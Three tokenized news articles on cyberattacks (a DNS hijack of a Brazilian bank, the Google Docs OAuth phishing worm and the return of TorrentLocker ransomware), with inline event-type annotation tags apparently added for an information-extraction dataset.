The traditional model of hacking a bank is n't so different from the old-fashioned method of robbing one . But one enterprising group of hackers targeting a Brazilian bank seems to have taken a more comprehensive and devious approach : One weekend afternoon , they rerouted all of the bank 's online customers to perfectly reconstructed fakes of the bank 's properties , where the marks obediently handed over their account information . Researchers at the security firm Kaspersky on Tuesday described an unprecedented case of wholesale bank fraud , one that essentially hijacked a bank 's entire internet footprint . In practice , that meant the hackers could steal Attack.Databreach login credentials at sites hosted at the bank 's legitimate web addresses . Kaspersky researchers believe the hackers may have even simultaneously redirected all transactions at ATMs or point-of-sale systems to their own servers , collecting Attack.Databreach the credit card details of anyone who used their card that Saturday afternoon . `` Absolutely all of the bank 's online operations were under the attackers ' control for five to six hours , '' says Dmitry Bestuzhev , one of the Kaspersky researchers who analyzed the attack in real time after seeing malware infecting customers from what appeared to be the bank 's fully valid domain . From the hackers ' point of view , as Bestuzhev puts it , the DNS attack meant that `` you become the bank . Kaspersky is n't releasing the name of the bank that was targeted in the DNS redirect attack . But the firm says it 's a major Brazilian financial company with hundreds of branches , operations in the US and the Cayman Islands , 5 million customers , and more than $ 27 billion in assets . And though Kaspersky says it does n't know the full extent of the damage caused by the takeover , it should serve as a warning to banks everywhere to consider how the insecurity of their DNS might enable a nightmarish loss of control of their core digital assets . `` This is a known threat to the internet , '' Bestuzhev says . `` But we ’ ve never seen it exploited in the wild on such a big scale . '' But attacking those records can take down sites or , worse , redirect them to a destination of the hacker 's choosing . In 2013 , for instance , the Syrian Electronic Army hacker group altered the DNS registration of The New York Times to redirect visitors to a page with their logo . More recently , the Mirai botnet attack on the DNS provider Dyn knocked a major chunk of the web offline , including Amazon , Twitter , and Reddit . But the Brazilian bank attackers exploited their victim 's DNS in a more focused and profit-driven way . Kaspersky believes the attackers compromised the bank 's account at Registro.br . That 's the domain registration service of NIC.br , the registrar for sites ending in the Brazilian .br top-level domain , which they say also managed the DNS for the bank . And those sites even had valid HTTPS certificates issued in the name of the bank , so that visitors ' browsers would show a green lock and the bank 's name , just as they would with the real sites . Kaspersky found that the certificates had been issued six months earlier by Let 's Encrypt , the non-profit certificate authority that 's made obtaining an HTTPS certificate easier in the hopes of increasing HTTPS adoption . `` If an entity gained control of DNS , and thus gained effective control over a domain , it may be possible for that entity to get a certificate from us , '' says Let 's Encrypt founder Josh Aas . `` Such issuance would not constitute mis-issuance on our part , because the entity receiving the certificate would have been able to properly demonstrate control over the domain . '' Ultimately , the hijack was so complete that the bank was n't even able to send email . `` They couldn ’ t even communicate with customers to send them an alert , '' Bestuzhev says . `` If your DNS is under the control of cybercriminals , you ’ re basically screwed . '' Aside from mere phishing Attack.Phishing , the spoofed sites also infected victims with a malware download that disguised Attack.Phishing itself as an update to the Trusteer browser security plug-in that the Brazilian bank offered customers . According to Kaspersky 's analysis , the malware harvests Attack.Databreach not just banking logins—from the Brazilian banks as well as eight others—but also email and FTP credentials , as well as contact lists from Outlook and Exchange , all of which went to a command-and-control server hosted in Canada . The Trojan also included a function meant to disable antivirus software ; for infected victims , it may have persisted far beyond the five-hour window when the attack occurred . And the malware included scraps of Portugese language , hinting that the attackers may have themselves been Brazilian . After around five hours , Kaspersky 's researchers believe , the bank regained control of its domains , likely by calling up NIC.br and convincing it to correct the DNS registrations . But just how many of the bank 's millions of customers were caught up in the DNS attack remains a mystery . Kaspersky says the bank has n't shared that information with the security firm , nor has it publicly disclosed the attack . But the firm says it 's possible that the attackers could have harvested Attack.Databreach hundreds of thousands or millions of customers ' account details not only from their phishing scheme and malware but also from redirecting ATM and point-of-sale transactions to infrastructure they controlled . Kaspersky 's Bestuzhev argues that , for banks , the incident should serve as a clear warning to check on the security of their DNS . He notes that half of the top 20 banks ranked by total assets do n't manage their own DNS , instead leaving it in the hands of a potentially hackable third party . And regardless of who controls a bank 's DNS , they can take special precautions to prevent their DNS registrations from being changed without safety checks , like a `` registry lock '' some registrars provide and two-factor authentication that makes it far harder for hackers to alter them . Without those simple precautions , the Brazilian heist shows how quickly a domain switch can undermine practically all other security measures a company might implement .

A widely reported e-mail purporting to be Attack.Phishing a request to share a Google Docs document is actually a well-disguised phishing attack Attack.Phishing . It directs Attack.Phishing the user to a lookalike site and grants the site access to the target 's Google credentials . If the victim clicks on the prompt to give the site permission to use Google credentials , the phish Attack.Phishing then harvests Attack.Databreach all the contacts in the victim 's Gmail address book and adds them to its list of targets . The phish Attack.Phishing appears to have been initially targeted at a number of reporters , but it quickly spread widely across the Internet . Some of the sites associated with the attack appear to have been shut down . The e-mail uses a technique that a Trend Micro report linked last week to Pawn Storm , an ongoing espionage campaign frequently attributed to Russian intelligence operations . The attack uses the OAuth authentication interface , which is also used by many Web services to allow users to log in without using a password . By abusing OAuth , the attack is able to present a legitimate Google dialogue box requesting authorization . However , the authentication also asks permission for access to `` view and manage your e-mail '' and `` view and manage the files in your Google Drive . '' The fake application used in the Pawn Storm phish Attack.Phishing ( which posed as Attack.Phishing a Google security alert ) was named `` Google Defender . '' Today's phish Attack.Phishing asks the target to grant access to `` Google Docs '' —a fake application using the name of Google 's service . If the target grants permission , the malicious site will immediately harvest Attack.Databreach contacts from the target 's e-mail and send copies of the original message to them . [ Update , 4:40 pm EDT : ] Google has struck hard at the worm . Not only have all the sites associated with the phish Attack.Phishing been taken offline , but the permissions associated with the worm have been dropped from victims ' accounts . The domains used in the attack were registered through NameCheap , and used a Panama-based privacy service to conceal the registration information . The hostnames were pointed at a server behind Cloudflare 's content delivery and denial-of-service protection network .

It 's been quiet since 2015 , but TorrentLocker has suddenly returned . And this time it wants to steal Attack.Databreach your passwords too . Cybercriminals are always adding new malicious tricks to ransomware . A ransomware variant which has been relatively inactive for almost two years is back , and this time it 's stealing Attack.Databreach user credentials from victims in addition to demanding a ransom Attack.Ransom to unencrypt locked files . TorrentLocker -- also known as Cryptolocker -- started targeting Windows users in 2014 before dropping off by the summer of 2015 . Like the majority of ransomware schemes , TorrentLocker spreads via spam email messages containing malicious attachments . Rising Bitcoin prices force Cryptolocker ransomware scammers to drop asking price Attack.Ransom Bitcoin 's wild fluctuations have forced a price update to the Cryptolocker ransomware . If the victim enables the macros by choosing to 'Enable Editing ' , a PowerShell code is executed and the ransomware is downloaded , encrypting the victims ' files until they pay a ransom Attack.Ransom . But that is n't where the malicious activity ends , because as noted by cybersecurity researchers at Heimdal Security , this incarnation of TorrentLocker has new features , including the ability to spread itself to other computers via shared files ; something which could see the ransomware taking over a whole network in a very short space of time . In addition to holding networks to ransom Attack.Ransom , the new version of TorrentLocker also harvests Attack.Databreach usernames and passwords from infected computers , putting businesses at risk of cyberespionage and data breaches Attack.Databreach , while users could see their personal or financial information leaked Attack.Databreach and sold to cybercriminals on the dark web . The researchers warn that the revived TorrentLocker campaign is `` very aggressive '' and that many well known antivirus software products have n't been updated to protect against it , even days after the campaign began . Heimdal Security warns users in its native Denmark that they 're being highly targeted by TorrentLocker . Indeed , it appears that European internet users are the main target for those behind the campaign , as Microsoft told BleepingComputer that Italy is by far the most targeted by the perpetrators .